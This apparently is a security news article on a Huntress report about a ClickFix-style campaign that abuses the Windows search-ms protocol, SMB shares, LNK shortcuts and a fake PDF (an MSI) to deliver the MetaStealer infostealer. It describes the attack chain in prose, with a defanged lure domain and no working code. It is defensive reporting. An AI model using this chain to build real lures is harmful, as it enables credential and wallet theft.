Beyond ClickFix: A New Attack Abuses Windows Search to Deliver MetaStealer

For over a year, Huntress researchers have been tracking the rise of ClickFix attacks, a form of social engineering that tricks users into executing malicious code by disguising it as a CAPTCHA verification. In their latest analysis, Huntress warns that adversaries are now blending ClickFix techniques with new twists, including the abuse of the Windows search protocol and disguised PDF lures, to ultimately deliver MetaStealer, a commodity infostealer active since 2022.

At its core, ClickFix relies on tricking users into “fixing” a supposed issue, often by interacting with a CAPTCHA-style page. As Huntress explains, “The premise of ClickFix is that threat actors convince users to ‘fix’ a purported issue, usually with a CAPTCHA on a webpage that they arrive on via a phishing message.” The “fix” is actually a command that victims copy and paste into Windows Run or PowerShell, silently kicking off the infection chain.

But attackers have been diversifying. “A few months ago, attackers turned to a similar technique, dubbed FileFix, which involves Windows File Explorer instead of the Run dialog box,” Huntress notes. These variants show how social engineering and “mundane” processes like CAPTCHAs continue to be weaponized.

The report details a recent campaign beginning with a fake AnyDesk installer hosted at anydeesk[.]ink. Victims who landed on the site were shown a fake Cloudflare Turnstile verification, urging them to “click to verify you are human.”

“Up to this point, this has all the tell-tale signs of a ClickFix campaign,” Huntress writes. But instead of leading to Run or PowerShell, the prompts abused the Windows search protocol (search-ms URI), redirecting victims into File Explorer.

Once inside Explorer, the victim was directed to an attacker-controlled SMB share containing a shortcut LNK file disguised as Readme Anydesk.pdf. Clicking it triggered the next stage.

The malicious LNK masquerade dropped both a legitimate AnyDesk installer (to avoid suspicion) and a fake PDF, which was in fact an MSI package.

Huntress highlights a clever trick: “Notably, this fake PDF is configured to grab the %COMPUTERNAME% environment variable as a subdomain. This is a clever way for the attacker to nab that information from the victim.”

Inside the MSI, researchers uncovered:

• A DLL (CustomActionDLL)
• A CAB archive containing malicious files, including 1.js (cleanup script) and ls26.exe (the MetaStealer dropper)

Protected with Private EXE Protector, MetaStealer carried out its usual infostealer behavior: stealing from crypto wallets, harvesting credentials, and exfiltrating files.

ClickFix, FileFix, and now this hybrid approach thrive because they combine social engineering with semi-legitimate workflows. Users believe they are fixing a verification error, and by taking the action themselves, they inadvertently bypass traditional security controls.

As Huntress warns: “These types of attacks that require some level of manual interaction… work in part because they can potentially circumvent security solutions.”

Related Posts:

• Malicious npm Package Masquerades as Nodemailer, Drains Crypto Wallets
• Fraudulent Scholarship Apps: A New Malware Campaign Targets Students in Bangladesh
• Trojan Horse: A Fake PDF Editor Is Actually a Malware-Laden Backdoor